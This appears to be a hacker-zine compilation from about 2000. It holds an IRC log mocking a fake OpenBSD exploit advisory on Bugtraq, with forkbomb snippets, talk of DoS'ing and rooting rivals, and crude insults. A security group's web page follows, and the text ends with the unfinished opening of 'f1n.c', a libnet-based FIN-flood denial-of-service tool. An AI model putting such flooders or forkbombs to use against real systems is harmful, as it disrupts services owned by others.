<john> moron.
<no_pants> john: what's happening? bogus bug ?
<john> hahaahah.
<john> A very smart attacker will:
<john>
<john> * Crash the kernel
<john> * Assume the location of the box which crashed (@ the co
lo)
<john> * Use DDB to gain god status
<mmap`> john, HAHAHA
<zothorn> john: yeah, i read that. But a real smart hacker will somehow remove
log entries so he doesn't get arrested
<aKt0r> HEH
<aKt0r> new openbsd hole released
<whoops> "hole"
<aKt0r> potential remote exploit
<whoops> more like local DoS.
<aKt0r> by the looks of it yeh
<aKt0r> a very sarcastic advisory towards the openbsd guys
<whoops> indeed.
<whoops> all it does is provoke a panic, though.
\xf9\xed\xf9 niles [milford@snow.cs.siue.edu] has joined #openbsd
<no_pants> so
<no_pants> they wanted a panic
<no_pants> now they got it
<aKt0r> have u tested it ?
<whoops> Yeah. The box panic'ed and booted.
<whoops> as expected.
<freite> 'Once the system has crashed, a local user (with access to the termina
l) may in fact hack the system.' <--- ummm
<no_pants> hahahah
<no_pants> console access
<no_pants> can't you mark console as insecure ?
\xf9\xed\xf9 rewben [~rewben@d141214.dtk.chello.nl] has joined #openbsd
<ratcorpse> aKt0r: its gone
<freite> well..you have access to the kernel debuger
<whoops> that is, _if_ the kernel is compiled to drop into DDB on panic.
<no_pants> what's DDB ?
\xf9\xed\xf9 kkenn [kris@citusc17.usc.edu] has joined #openbsd
<whoops> debugger
<ratcorpse> its some idiot kid who was pissed at zsh, ssg , teso and obsd allto
gether
<ratcorpse> hmm
<ratcorpse> btw
<freite> i have ddb.panic=0
<kkenn> NEWSFLASH! You can root an openbsd box if you have access to the serial
console and it's got DDB in the kernel! :-)
<ratcorpse> is there anything like solaris /etc/system in obsd that u can tune
stuff with?
<zb^3> i'm on thier channel
<zb^3> we're trying to find out how you telnet into DDB on OpenBSD
<zb^3> :)
<genecyst> wow, #hackphreak is amazingly lame
<whoops> http://www.realweasel.com/
<whoops> (nice cards :)
<kkenn> genecyst: :-)
\xf9\xed\xf9 SignOff newsham: #Phrack (zzz)
<defile> I can see why, it's got like seven people in the channel
<defile> 6 now ;-)
<kkenn> <vac_> tomorrow attrition is going to be filled with defaced openbsd si
tes
<whoops> lol
<`Athlon> So what there is a big fucking bug in it?
<Feanor_> unfortunately realweasel cards are 250$/pop
<nosaj> vac_ must be portraying some sarcasm.. he knows better
<aKt0r> is openbsd2.7 vuln to it ?
<whoops> aKt0r: yes.
<genecyst> the funny thing is rloxely used Outlook to mail the advisory
<genecyst> talk about security holes...
<whoops> this is what I got, btw, after rebooting
<whoops> Nov 6 07:48:02 wintermute savecore: reboot after panic: AMAP_B2SLOT:
invalid by
<whoops> te count
<no_pants> uhm
<no_pants> get this
<no_pants> you don't need realweasel cards
<no_pants> some of the new intel 2u rack mount chassis
<no_pants> you can set up in the bios to use the serial port instead
<Feanor_> no_pants: but that shit is even more expensive
<zb^3> yupp
<zb^3> we do that
\xf9\xed\xf9 SignOff vac_: #Phrack (I'm too lame to make a quit message)
<Feanor_> oh that ya...but you can't use a serial port to reboot a misbehaving
box
<no_pants> feanor: not really
<zb^3> i hope we don't get rooted through this 'DDB' thing
<no_pants> the intel 2u shit
<`Athlon> At lest they cant do that if they dont have acess to the box
<zb^3> T ALEPH1 PLZ BE ALLOWING POSTS FROM NORMAL USERZ AND NOT JUST SKRIPT KI
DDIEZ K PLZ THNX
<Feanor_> aleph's getting lazy ;P)
<zb^3> heh
\xf0 zb^3/#openbsd jerkcity'd aleph a couple of weeks ago
<lumpy_> rloxely seems to think all exploits are remote exploits
\xf9\xed\xf9 SignOff kyoorius: #Phrack (Leaving)
<ratcorpse> dude
<ratcorpse> its not rlox who wrote it
<ratcorpse> its some gay kid
<ratcorpse> he knows what hes doing, he wrote it to bash ppl but it backfired a
nyway
<no_pants> rloxely is gonna get dos'ed
<ratcorpse> it is NOT rloxlyt
<ratcorpse> damn
<no_pants> i hope someone roots his ass and reports to bugtraq howmuch of a mor
on it is
<genecyst> hah, that would just be lame
<ratcorpse> the kid who made it is a .lifeless dork
<ratcorpse> i mean
<ratcorpse> whatever john will kb me if i keep talking about this shit
<ratcorpse> no comment
<lumpy_> well, that all makes sense now
\xf9\xed\xf9 SignOff rewben: #OpenBSD (gotta go)
\xf9\xed\xf9 mindsport [mind@talon.darkshadow.org] has joined #openbsd
<zb^3> i'm making a yahoo club for rloxley fans
<lumpy_> because the last time ive seen people talking to rloxley
<lumpy_> he didnt seem to know very much
<aKt0r> somebody might have ripped him off
<genecyst> haha
\xf0 zb^3/#openbsd forges a post from alpeh1 to bugtraq about the evil ctrl+alt
+esc break to DDB sploit on freebsd!
<zb^3> fear
<aKt0r> lol
<aKt0r> did someone dos everyone with the new sploit
<aKt0r> ?
\xf9\xed\xf9 SignOff cpt: #Phrack (moff moff)
<defile> not that I know of
<sizaym> indeed
<aKt0r> probably coded a quick script
\xf9\xed\xf9 bind [bind@subterrain.net] has joined #openbsd
<aKt0r> bind heh
<seifried> splork time
<bind> god.
<bind> how rediculous
<aKt0r> the new sploit worked fine in a shell script against all the bots :P
<bind> dude, you dont know what the fuck you are talking about.
<bind> you have been misinformed.
<aKt0r> hah
\xf9\xed\xf9 SignOff drkspyrit: #Phrack (Read error: 54 (Connection reset by pe
er))
\xf9\xed\xf9 SignOff Lionel_: #Phrack (Ping timeout: 240 seconds)
<seifried> fresh pooh
<ratcorpse> * zb^3 forges a post from alpeh1 to bugtraq about the evil ctrl+alt
+esc
<ratcorpse> break to DDB sploit on freebsd!
<Figz> BAHA, everyone read this:
<Figz> From: rloxley <rloxley@HACKPHREAK.ORG>
<Figz> Subject: OpenBSD Exploit
<Figz> To: BUGTRAQ@SECURITYFOCUS.COM
<Figz> Man, that group gives OpenBSD-haters a bad name.
<zb^3> hehe
<zb^3> T FIGZ KAN U SHOW ME HOW TO COMPILE DDB INTO MY KERNEL K PLZ THNX??
<Figz> heh
<zb^3> T FIGZ WHAT PORT IS 'DDB' ON IN OPENBSD
<zb^3> ????
<Figz> I especially like the bit about it being a "remote hole"..
<Figz> You see, just log in remotely, crash the kernel, drive out to the colo,
repair all the vm damage from ddb, set euid to 0 in some shell, set the system
running again..
<Figz> Hmm, oh yea, "remote hole"!
<Ober_> ok made it
<Ober_> is there a security mailing list for obsd?
<Ober_> I would prefer to remove myself from bugtraq for obvious reasons
<code9> today openbsd local dos released from bugtraq
<Ober_> heh
<Ober_> did not see one
<Ober_> :)
<freite> is there a patch for the DOS?
<Ober_> which dos?
<Ober_> I did not see a reference to obsd this morning.
<code9> http://www.securityfocus.com/templates/archive.pike?list=1
<code9> openbsd exploit article
<Ober_> so what is the exploit.
<Ober_> I can not click on the adv file without it wanting to d/l it. :(
\xf9\xed\xf9 SignOff renz: #Phrack (Ping timeout: no data for 250 seconds)
\xf9\xed\xf9 Tal_ is now known as Kaki
<StJohn> What? The panic-thing?
\xf9\xed\xf9 rewben [rewben@d131204.dtk.chello.nl] has joined #openbsd
\xf9\xed\xf9 dhartmei [~dhartmei@cable-ggar48-183.intergga.ch] has joined #open
bsd
\xf9\xed\xf9 SignOff rewben: #OpenBSD (Client Quit)
\xf0 Ober_/#openbsd does not see the exploit
<Ober_> http://just.rtfm.net/things_that_kill_bsd/
<Ober_> time to add this new one
<Ober_> so how the hell is this a "remote" exploit?
<Ober_> #hackphreak has too much of an agenda.
<dhartmei> still arguing about the fake exploit? :)
<Ober_> is it fake?
<Ober_> I have not tried it yet
<dhartmei> the one that was remove from packetstorm? yes, for exactly that reas
on.
<code9> Ober,me too
<code9> #hackphreak article - Section 5 [TO HELL WITH YOU'S]:
<code9> Theo de Raadt and the OpenBSD Team
<Ober_> yeap
<Ober_> "get root remotely"
<Ober_> haha
<code9> what's mean?
<code9> "get root remotely"?
<Ober_> yes
\xf9\xed\xf9 torqumada [anonymous@paladincorp.com.au] has joined #openbsd
<Ober_> it means that they say you can get root on openbsd with this exploit re
motely
<Ober_> dropping a box to ddb from a ssh login does not count as root
<Ober_> :)
\xf9\xed\xf9 seiki [seiki@chaotic.darkmind.org] has joined #openbsd
<Ober_> if it does actually crash it, then its still a local dos
<seiki> morning
<Figz> I haven't been able to make it work.
<Ober_> morning
<dhartmei> it's a simple execlp() bomb, aka forkbomb
<Ober_> hey figz
<Ober_> figz the bomb?
<dhartmei> Figz: remove the user limits :)
<Ober_> so its not a real uvm bug?
<Figz> There may well be something to it, but that exploit isn't even close to
doing anything weird or dangerous.
<Ober_> hell I got some of those
<dhartmei> no, it's completely fake
<Figz> Read the exploit, it does nothing.
<Ober_> http://just.rtfm.net/things_that_kill_Bsd
<Ober_> http://just.rtfm.net/things_that_kill_bsd
<code9> dhartmei,Figz, hi
<code9> fake?
<Figz> ober, is that the one on bugtraq last night?
<Ober_> figz the ones I have no.
<Ober_> but some of them do the same thing
<Figz> what?
<Figz> same thing as the one on bugtraq?
<Ober_> I have a sh script that
<Ober_> will
<Figz> wtf are you talking about, the one on bugtraq doesn't do anything at all
<Ober_> well same sort of resource exhaustion
<Ober_> mine are mbufs
<Ober_> figz ahh..
\xf0 seiki/#openbsd tested it.. did nothing
<Figz> "yours" are mbufs? what does this have to do with the one on bugtraq?
<Ober_> http://just.rtfm.net/things_that_kill_bsd
<code9> dhartmei, this article is only fork bomb?
<Ober_> you said that what they had was just a forkbomb.
<Figz> ober, I saw the url, you haven't answered my question
<Figz> I said no such thing.
<Ober_> ok.
<Figz> show me where I said this
<Figz> and answer my question
<dhartmei> code9: i'm not sure we're talking about the same one. but yesterday
there was much chattering about one one packetstorm that was completely fake, w
ell, just a forkbomb with exaggerated comments (not remote)
\xf9\xed\xf9 SignOff tequiare: #OpenBSD (Ping timeout: no data for 247 seconds)
<Ober_> sorry it was dhartmei that said it
<code9> dhartmei, aha
<Ober_> <dhartmei> it's a simple execlp() bomb, aka forkbomb
<Figz> dhartmei, the "exploit" on bugtraq last night doesn't even work as a for
kbomb
\xf9\xed\xf9 Vik_ [~co@213.237.17.39] has joined #openbsd
<Ober_> and I was just commenting that I had a collection of simular scripts
<Figz> it would need to write its image back out to a file first
<Figz> it doesn't do that
<Ober_> ok. I stand corrected.
<Figz> instead it casts the data to a struct exec, and then does nothing with t
hat pointer
<Figz> ie, it's totally useless, does nothing
<Figz> is not obvious how it COULD do anything
<dhartmei> oh, there are several, then. a DoS on this channel, at most :)
<code9> dhartmei, openbsd able forkbomb attack
<Vik_> is 2.8 out ?
<code9> use ping
<dhartmei> they sound related, they posted to bugtraq first, then extended it a
nd posted it to packetstorm, it seems. the one on packetstorm did execlp() a co
py endlessly.
<seiki> 2.8 is due out dec 1st.
<Vik_> it says on the web page under errata that it is 2.8
<Vik_> yeah
<Ober_> they say it was a prank
<Ober_> <p0lar> freebased he listen, you shouldnt take that bugtraq thing too s
erious, its some prank thing against rloxley heh
<dhartmei> code9: of course you can forkbomb on obsd, if you don't set user lim
its. i crashed myself running the thing as non-limited user :)
<dhartmei> code9: the same code works on nearly any unix, including Linux for i
nstance. it's a prank.
<StJohn> freite: Oh.
<code9> dhartmei,yep
<Vik_> there is no major change in 2.8 except new drivers , bug fixes ?
\xf9\xed\xf9 gaius [info@plan9.hert.org] has joined #phrack
<gaius:#phrack> hey!
\xf9\xed\xf9 SignOff Pie: #OpenBSD (^B[^BBX^B]^B The birds kept calling his nam
e, thought Caw)
\xf9\xed\xf9 krapht [~krapht@ikarus.hardboiledegg.com] has joined #openbsd
<gaius:#phrack> jakarta rules
<Ober_> figz it works?
<gaius:#phrack> if you are interested in remote work or coming here fucking som
e indonesian pussies.. send bio resume to acz@hert.org
<gaius:#phrack> ^G
*** OBSDCMNT : shutup fukko ***
<noppa> openbsd: (clueless admin required to add holes)
<is-> (if you have read through this you have now more reason to switch to Linu
x).
<is-> hahahahahahahhhhh
<Figz> We don't get ctcp floods here.. when this channel gets attacked it's usu
ally DDoS...
<Ober_> figz did you ever find how to "fix" the bugtrack "sploit" so that it di
d anything at all?
<Figz> ober, the "fix" is "include <sys/stat.h>"
<Ober_> ahh
<Figz> I just pasted when I was trying it out.
<Figz> pastoed even
<Ober_> that would just prevent it from compiling thought right?
<Figz> that is all
<Ober_> so it was just fud then. heh
<Figz> no, the exploit works
<Ober_> hmm
<Figz> not enough sanity checking on the a.out header values
<is-> I hope this advisory brings you closer to NT / Linux, rather than
<is-> OpenBSD. Linux & NT are way better anyway.
<coax> heh. the app guesses where a structure's data is.
<is-> LMAO
<seiki> what poor lost soul wrote that
\xf9\xed\xf9 typo [typo@ingsoc.org] has joined #openbsd
<Figz> it's a pretty silly post alright..
\xf9\xed\xf9 Riedel [riedel@oper.irc.emory.edu] has left #openbsd []
<coax> Naw. OpenBSD's the better choice. obviously. heh.
<dhartmei> i can part when i see it split
<Figz> #2 0xe0127465 in panic (fmt=0xe01e0170 "AMAP_B2SLOT: invalid byte count
") at ../../../../kern/subr_prf.c:214
<Figz> #3 0xe01e062e in amap_alloc (sz=4099, padsz=0, waitf=1) at ../../../../
uvm/uvm_amap.c:230
<Figz> #4 0xe01e0cf6 in amap_copy (map=0xe277d25c, entry=0xe277ea30, waitf=1,
canchunk=1, startva=8192, endva=8193) at ../../../../uvm/uvm_amap.c:603
<Figz> Anyone know any irc.colorado.edu opers? That'd do for getting the channe
l back..
\xf9\xed\xf9 wkz [wackie@freebsd.org.il] has joined #openbsd
\xf9\xed\xf9 wkz [wackie@freebsd.org.il] has left #openbsd []
<slutpuppy> for (i = 0; i > f0rbomb; i++) { Sem_wait(&ptr->mUtEx); printf("my n
4m3 is rl0xl3y 4nd 3y3 4m a h4x0r3r %d\n") } exit(0); }
\xf9\xed\xf9 bugoid [bug@gecko.roadtoad.net] has joined #openbsd
<slutpuppy> :) hello yall
<Soal_Reap> what ever -q does..
<mmap`> pthread_join()
<dhartmei> it does what man dhcpd says
<Soal_Reap> heheh
<mmap`> #define NTHREADS 500
<mmap`> ulimit -n 600
<mmap`> ./fokbmb
\xf9\xed\xf9 f0rkbomb is now known as sil
<sil> www.antioffline.com/er3et.c <--- new OpenBSD advisory (shhhh)
<fx> it was fake? i thought it was too stupid to be true
<Pie> live
<fx> the bug was already fixed though.
<bind> yea, it wasnt by rloxley, ssg or anyone
<bind> some dude named lore wrote it
<bind> to attempt to embarrass some people
<fx> oh, lore.
<bind> stupid fuck
<bind> im pretty pissed off
<fx> lore of.. b4b0?
<freite> Pie: www.opensound.com
<bind> i guess so
<bind> some stupid fuck
<Wangster> "a smart attacker will.......... walk up to the console...." ROTFL
<Wangster> I think if you have an attacker walking up to the console you have m
uch larger problems... haha
<rwxr--r--> finished... completely done... www.antioffline.com/er3et.c
<Soal_Reap> thnks all fer yer help
<rwxr--r--> someone send me a million $US now
<rwxr--r--> or i'll post it to bugtraq
| rys (rys@supernal.godsey.net) (Internic Network)
\xb3 ircname : Joe
| channels : #openbsd #Icons_Of_Vanity
\xb3 server : irc.east.gblx.net (Global Crossing East Client Server)
| away : rys - gone
: idle : 1 hours 3 mins 18 secs (signon: Sun Nov 5 22:15:00 2000)
<~el81> rys, What happened to all that talk of the bug being only a 'fork() bom
b' and calling everyone cluebies, its valid, now give me patches
\xf0 dhartmei/#openbsd makes fire to roast the troll
<toor> fork bombs can be stopped by limiting resources before the shell is exec
uted
<~el81> The bug on bugtraq, I first heard about it on packetstorm
<~el81> This really sucks people have crashed two of my machines
<~el81> troll? dhartmei, if I recall correctly, you also thought it was a fork(
)
bomb
<Figz> 0h H0, 1tz ob3ci4n..
<dhartmei> i still think it is. or does someone _serious_ confirm that the "ehd
r->a_data += 3;" is the relevant part of the code. apart from that, it _is_ jus
t
a forkbomb, that much i can tell.
<~el81> Uh, earlier I saw figz confirm the a_data+=3 is the actual bug.
<~el81> He pasted backtrace from what I saw.
<obecian> figz: ssg is so pissed about being mentioned in that bogus hp2.adv
<Figz> ssg?
<obecian> yeah the original advisory that got pulled off packetstorm within a f
ew hours
<obecian> subterrain
<~el81> You should go crash yourself again.
\xf9\xed\xf9 samurii [samuri@shell2.shore.net] has joined #openbsd
<Figz> the "advisory" showing up on bugtraq when it did probably got it fixed i
n 2.8
<john> haha.
<Figz> so it's probably just as well.
<obecian> figz: yup
<~el81> Good, it is patched in 2.8 already?
<Figz> yea, 2.8 will be patched
<Figz> but it was close
<~el81> oh, will be
<kajar> er good god, there was actually a bug in that mess?
<~el81> Good they released before 2.8 at least
<shinobi> that bugtraq post was goofy as shit
<shinobi> ppl like to embarrass themselves there
<kajar> that adv was totally silly, i still have trouble believing it is real
<obecian> shinobi: yeah i wish my name wasn't on there sheesh
<fx> Why was your name on there?
<obecian> shinobi: the "real" advisory has me on the "fuck-you's" list for repo
rting the uvm bug too early to theo
<fx> Oh.
<~el81> Well, all I'm saying is I need patches for 2.7, because these guys are
crashing my kernel, anyone have an estimate?
<fx> Well, it was all bull.
<obecian> yup
<fx> "Private release date: Nov 5, 1998". Uh, uvm wasn't even in the tree in 19
98.
\xf9\xed\xf9 SignOff Ghostwhee: #Phrack (SendQ exceeded)
<toor> ~el81 - get out of the shell bizz
<obecian> right ;)
<~el81> shell bizz?
<~el81> oh :)
<obecian> and i never mailed theo about a uvm bug, and ssg never helped out wit
h the advisory or code to the advisory
\xf9\xed\xf9 SignOff saw: #OpenBSD (night)
<obecian> as far as i know hackphreak didn't have anything to do with it... it'
s someone that is pissed cuz of xlock from a while back
<obecian> that could only be adm in my mind
<obecian> well whatever, as long as we got something out of it
\xf9\xed\xf9 xav [xavier@02-095.063.popsite.net] has joined #openbsd
<~el81> Yeah toor, I had to remove three people, for crashing me every minute
<ratcorpse> http://www.antioffline.com/er3et.c
<ratcorpse> holy fucking cow
<toor> eh
<seifried> that is so incredibly ugly
<john> ratcorpse, don't you have something better to do?
<john> printf(*size = d%\nwOrD tO bIgBiRd 3y3 0wN ev3rYtHinG\n);
<obecian> too much leet speak for one day =/
<majidf> hehe
\xf9\xed\xf9 SignOff obecian: #OpenBSD (end of line)
\xf9\xed\xf9 Topic (#OpenBSD): http://www.openbsd.org/errata27.html#execsubr
<obecian> did you see the second piece of code off of www.antioffline.com
\xf0 jZZzZZz/#openbsd sticks his long hard fat FLAG POLE into the CUNT of #hack
phreak
<obecian> shit that's horrid
<obecian> http://www.antioffline.com/er3et.c
<jZZzZZz> As a joke, I'm going to post a letter to Bugtraq about a new vulnerab
ility in OpenBSD..... The one where you can walk up to the console, and take it
.
<jZZzZZz> The only solution is to use TCFS.
<obecian> hahahah
\xf9\xed\xf9 SignOff datafirm: #OpenBSD (Read error: 54 (Connection reset by pe
er))
<jZZzZZz> And of course the OpenBSD developers were hiding this from everyone.
<obecian> five finger discount vulnerability
<obecian> version 1.0
<obecian> hehe
<jZZzZZz> I am working on it nowl.
<jZZzZZz> does anyone have an archive of the original lame vulnerability so i c
an use it as a template for my lame-O advisory ?
<SmooveB> do you want that with the 2 blank messages attached (text and html)?
<jZZzZZz> i want the fucking advisory
<jZZzZZz> asdasfasjfjasajsjoasojasdfojasfd
<SmooveB> on its way
<jZZzZZz> noi
<jZZzZZz> i am stupid and i dont want to learn mutt
<jZZzZZz> i am so used to pine that to switch would make my brain leak acids
<jZZzZZz> OK, i figured it out
<jZZzZZz> they attached the advisory as a separate tex tfile
<jZZzZZz> - :Leet Advisory % :Leet Advisory % :Leet Advisory % :Leet Advisory %
:Leet -
<jZZzZZz> |
|
<jZZzZZz> | www.dqc.org/~chris
|
<jZZzZZz> |
|
<jZZzZZz> | Version : Leet advisory #2666 of many
|
<jZZzZZz> | Author : LarFoxley[lamedork / condemned / ESP / AH / PPTP (soon)
] |
<obecian> HAHAHAH
<obecian> HAHAHAHHA
<jZZzZZz> | Contributed : All of Team Leet (thanks alot) & UVM
|
<jZZzZZz> | Topic : A non-priviledged user may gain physical access to th
e |
<jZZzZZz> | system, thus exploiting what is known in innner circl
es as |
<jZZzZZz> | "the five-finger discount"
|
<jZZzZZz> | Effected : All Operating Systems which use a computer
|
<jZZzZZz> | * OpenBSD, and possibly others
|
<obecian> HAHAHA
<jZZzZZz> | Prvt Release : October 1, 1995
<obecian> hahaha i will laugh if aleph1 lets that through
<dxmd> AHHAHHAHAH
<dxmd> jZZzZZz: post it to pakcetstorm too since those dorks dont check anythin
g at all
<dxmd> ok im off to bed
<dxmd> nite all
<SmooveB> not enough 0 and 3 and z in there.
<jZZzZZz> Shut up Dave, I'm trying to keep true to the original Skript
<jZZzZZz> g0tta Keep 1t R3al!#@())!@#(
<obecian> yeah noone will believe it's a real advisory with all that proper eng
lish
<obecian> where's that leetspeak lex filter
<dxmd> blame it on obecian
<jZZzZZz> I would like to thank bass of BEER. He started the whole Ope
nBSD
<jZZzZZz> religion. Keep up the good work.
<jZZzZZz>
<jZZzZZz> Special thanks to obecian and his DoS 3.3 System. It has mad
e my
<jZZzZZz> job so easy that I think I should not be paid anymore.
<jZZzZZz> I would also like to thank: NSA, CIA, FBI, Jammu Siltavuori,
<jZZzZZz> Kettutytt, Somali, Dorkex (h0rze :), ISS, Solar Designer, #bl
owjob,
<jZZzZZz> #hotsex, #eatshit, #42, #conf, Al Hugher, Alpeh1, and Jello B
iafra.
<obecian> AHHAHAHAHA
<dxmd> HAHAHHAHAHAHHAHAH
<dxmd> man
<jZZzZZz> how do you spell diahrheah
<jZZzZZz> how do you spell diahrheah
<obecian> diarea or diahrea not sure
<jZZzZZz> I would also like to thank: NSA, CIA, FBI, Jammu Siltavuori,
<jZZzZZz> Kettutytt, Satan, Dorkex (h0rze :), ISS, Solar Designer, #blo
wjob,
<jZZzZZz> #hotsex, #eatshit, #42, #conf, Al Hugher, Alpeh1, communism,
the
<jZZzZZz> US Air Force, OJ Simpson, Ralph Nader and Jello Biafra.
<jZZzZZz> shooop$ grep diah /usr/share/dict/words
<jZZzZZz> diaheliotropic
<jZZzZZz> diaheliotropically
<jZZzZZz> diaheliotropism
<jZZzZZz> Obadiah
<jZZzZZz> shooop$ grep diarh /usr/share/dict/words
<dxmd> this rocks
<jZZzZZz> diarhemia
<jZZzZZz> fuck
<jZZzZZz> @#$@$#
<obecian> HAHA
<obecian> hahahah
<dxmd> um what about chlamidia?
<jZZzZZz> whassat?
<jZZzZZz> What C code should I put into the new openbsd exploit ?
<jZZzZZz> #include <stdyo.h>
<jZZzZZz> #include <streengs.h>
<jZZzZZz> main()
<jZZzZZz> {
<jZZzZZz> prentf("hello, world!!!!!\n");
<jZZzZZz> }
<jZZzZZz> PS: The expoit is broke very slightly, so it takes some knowledge ;)
<jZZzZZz> PUBLIC RELEASE * DO NOT DISTRIBUTE
<Figz> Don't forget, private release date: Jan 23, 1979
<jZZzZZz> what's significant about Jan 23, 1979
<Figz> That it's 16 years before openbsd's inception, of course.
<jZZzZZz> You want to see what I got now ?
<Figz> Yea, "hello world" tekniq..
<jZZzZZz> want me to email you what i got?
<jZZzZZz> i ned comments
<jZZzZZz> about to go to sleep
<jZZzZZz> but i want to fire this off to bugtraq first
<jZZzZZz> THIS IS A SERIOUS EXPLOIT PEOPLE!!!
<jZZzZZz> BUGTRAQ READERS MUST KNOW ABOUT IT!!!!
<jZZzZZz> Fuck this, i'm sending it, gotta go to sleep
<jZZzZZz> night night
<sean-> wtf is this bullshit i'm reading on bugtraq
<mmap`> sean, whats bs?
<cripto> fake, obviously.
<sean-> the 'openbsd machine can be stolen' advisory
<mmap`> rofl
<cripto> both are fake.
<sean-> i know
<sean-> but who the hell would approve that?
<cripto> i'm dissapointed that elias approved them
<jeremie> aleph1
<jeremie> same guy who approves every other post
<cripto> but oh well, he's the moderator.
<jeremie> he'll refund your subscription cost if you're pissed
<jeremie> i bet
<cripto> hah ;)
<sean-> haha
<sean-> btw cripto sean called me ;)
\xf9\xed\xf9 SignOff highvolts: #OpenBSD (return 0;)
<mmap`> more like canceling
<mmap`> and cp'ing your subscript data to /dev/null
<mmap`> yo sean
<mmap`> wheres the article
<shure> Running make depende echo : is a directory *** Error[1] -- Come one..
<sean-> dunno, it just came through i believe..
<sean-> subject is 'Another OpenBSD vulnerability!!'
<dxmd> hahaha
<dxmd> hey
<dxmd> sean
<dxmd> can u do me a favor and give me the url
<mmap`> idont see it
<dxmd> chris posted that article to prove what a moron aleph1 is
<sean-> dxmd: it's in my mailbox, i don't have a url :)
<dxmd> people
<dxmd> give me the fucking url
<dxmd> ok then dcc me
<dxmd> ill put it on my site
<sean-> ok hang on
<Intrinsic> why don't you look at the BugTraq archives?
<jeremie> dxmd whats your email
<genecyst> dxmd: http://squeamish.org/leet.advisory
<dxmd> rat@interniq.org
<dxmd> chris rules
<zb^3> that advisory is leet
<zb^3> -- leet -- leet -- leet --
<zb^3> does Aleph1 even care anymore?
<mmap`> HAHAHAHAHA
<mmap`> #eatshit
<mmap`> dood this faq is the best, mad funny
<fx> *** Mode for channel #eatshit is "+tin"
<mmap`> Three years without a remote hoe? Strike that.
<toor> Subject: ANOTHER OpenBSD security vulnerability!!!!
<toor> - :Leet Advisory % :Leet Advisory % :Leet Advisory % :Leet Advisory % :L
eet -
<sil> hope that wasnt for me toor
<sil> ahh yea i read that one but it wasnt me this time
<sil> i only write *snicker* real advisories
<no_pants> i've got an advisroy
<no_pants> i can crack any obsd box
<no_pants> all i have to do is sit on it
<no_pants> time to email bugtraq!
<genecyst> you must be very fat
<sil> i can hack openbsd with a jigsaw
<no_pants> my ass has no bounds checking
[END_CUT] irclogs
[CUT_HERE] www.subterrain.net
Subterrain.net
____________________________________________________
CAPTION:
About
It is difficult to describe eloquently the driving forces behind and
future goals of the hacker collective known as SSG. We are motivated
by the lack of a complete set of solid, portable, and freely available
open source tools for performing computer and network security related
tasks. Further, we firmly believe that revolutionary R&D is and should
increasingly be supported in open, peer-review type arrangements to
facilitate unbiased and uncommercialized advancements in data
security.
CAPTION:
News
November 7: That "OpenBSD exploit" advisory on bugtraq was fake. We do
not know the individual who posted the message. It saddens us to see
childish attempts at defamation in public forums.
October 15: cripto posts a collection of buffer overflow papers; as
well as hardware architecture and assemby language manuals for several
architectures (MIPS, PowerPC, PA-RISC, SPARC, and Alpha) - good
reading.
October 14: aempirei releases libsd, a configurable packet control
library for high throughput networks.
October 4: aempirei releases his paper "Remote Host-to-Host Path Cost
Projection". It describes a method for projection and estimation of
remote host-to-host metrics, or path costs in any network.
CAPTION:
Projects
Sentinel - A reference implementation of all publicly known remote
promiscuous detection techniques.
Siphon - A tool that demonstrates stealth passive network mapping
and intel gathering technology.
Intravenous - A network packet injection study of expert systems and
machine learning over TCP/IP.
Architecture Spanning Shellcode - Shellcode that executes on
multiple architectures: SPARC, MIPS, and Intel.
libsd - A packet control library for BPF platforms. It is designed
with high throughput and high-bandwidth networks in mind. Features
include a user specified buffer size, a circular buffering method, and
extremely low latency function returns.
CAPTION:
Papers
Remote Host-to-Host Path Cost Projection. View.
Self Replicating, Self Permutable Code and the Invisible Binary.
View.
Palante's DEFCON 8 CTF server. View.
802.14 and DOCSIS Standard Information. View.
Dynamic Kernel Linker Facility Programming Tutorial by awr. View.
Palante's Toorcon 2000 Lecture on Mandatory Access Controls. View.
Obecian's Toorcon 2000 Lecture on Intravenous. View.
Mike's Toorcon 2000 Lecture on Porting UNIX Network Applications to
Win32. View.
Bind, aempirei, prole and cripto's Toorcon 2000 Lecture on Passive
Network Mapping. View.
Awr's Toorcon 2000 Lecture on Dynamic Kernel Linker (KLD)
Programming. View.
CAPTION:
Code
spoon - (ab)use dig.cgi to proxy DNS dig requests.
silk - simple evasive HTTP packet injection.
urlsnuff - urlsnarf remote dos attack (<=dsniff 1.6).
grout - A tool for performing geographical traceroutes.
PPC shellcode - Palante's shellcode for the PPC.
CAPTION:
Users
aempirei, awr, bind, cripto, dnm, eugene, jeremy, mike, mikep,
obecian, pandora, palante, prole.
____________________________________________________
Copyright (c) 2000 Subterrain Security Group. Last updated Wed Sep 6
13:55:17 PDT 2000 .
[END_CUT] www.subterrain.net
[END_DIR] OpenBSD
_______________________
.-' `-.
[07]| f1n.c |[07]
[07]| by: |[07]
[07]| lore |[07]
`-._______________________.-'
This is private. But now I guess it is public. Also, I would
like to give personal thanks to route for LibNET.
[BEGIN_DIR] lore
[CUT_HERE] f1n.c
/*
* - Program: fin.c
* - Purpose: FIN flooder
* - Author: lore <fiddler@antisocial.com>
* - Compile: cc -o fin fin.c `libnet-config --defines` -lnet
* - Usage: ./fin -h
*
*/
#ifndef __BSD_SOURCE
#define __BSD_SOURCE
#endif
/* Header files */
#include <db.h>
#include <netinet/in_systm.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <libnet.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#include <string.h>
#include <sys/signal.h>
#include <sys/types.h>
#include <sys/socket.h>
__BEGIN_DECLS
/* Definitions */
#define IP_SIZE (sizeof(struct ip))
#define TCP_SIZE (sizeof(struct tcphdr))
#define TOTAL_SIZE (IP_SIZE + TCP_SIZE)
#define TRUE (0x1)
#define FALSE (0x0)
#define ERR (0xffffffff)
/* Data-types */
typedef int sock_t;
/* Global variables */
char * packet_buf;
FILE * stream;
sock_t raw_sock;
char * yes = "1";
/* Prototypes */
int main __P ((int, char * *));
void ctrlc __P ((int));
void die __P ((int));
void usage __P ((char *));
char * strip __P ((u_long));
u_long res __P ((char *));
size_t send_fin_packet __P ((u_long));
__END_DECLS
/* Functions */
int main (int argc, char * * argv)
{
u_char * ptr = *argv;
u_long victim = ERR;
stream = stderr;
++argv; --argc;
while (argv && *argv)
{
if (victim == ERR)
{
if ((victim = res(*(argv))) == ERR)
{
fprintf(stderr, "> Bad victim: %s\n", *argv);
exit(EXIT_FAILURE);
}
}
else usage(ptr);
++argv;
}
if (victim == ERR)
{
usage(ptr);
}
if (!(packet_buf = (char *)malloc(TOTAL_SIZE)))
{
fprintf(stream, "> Ran out of memory\n");
exit(EXIT_FAILURE);
}
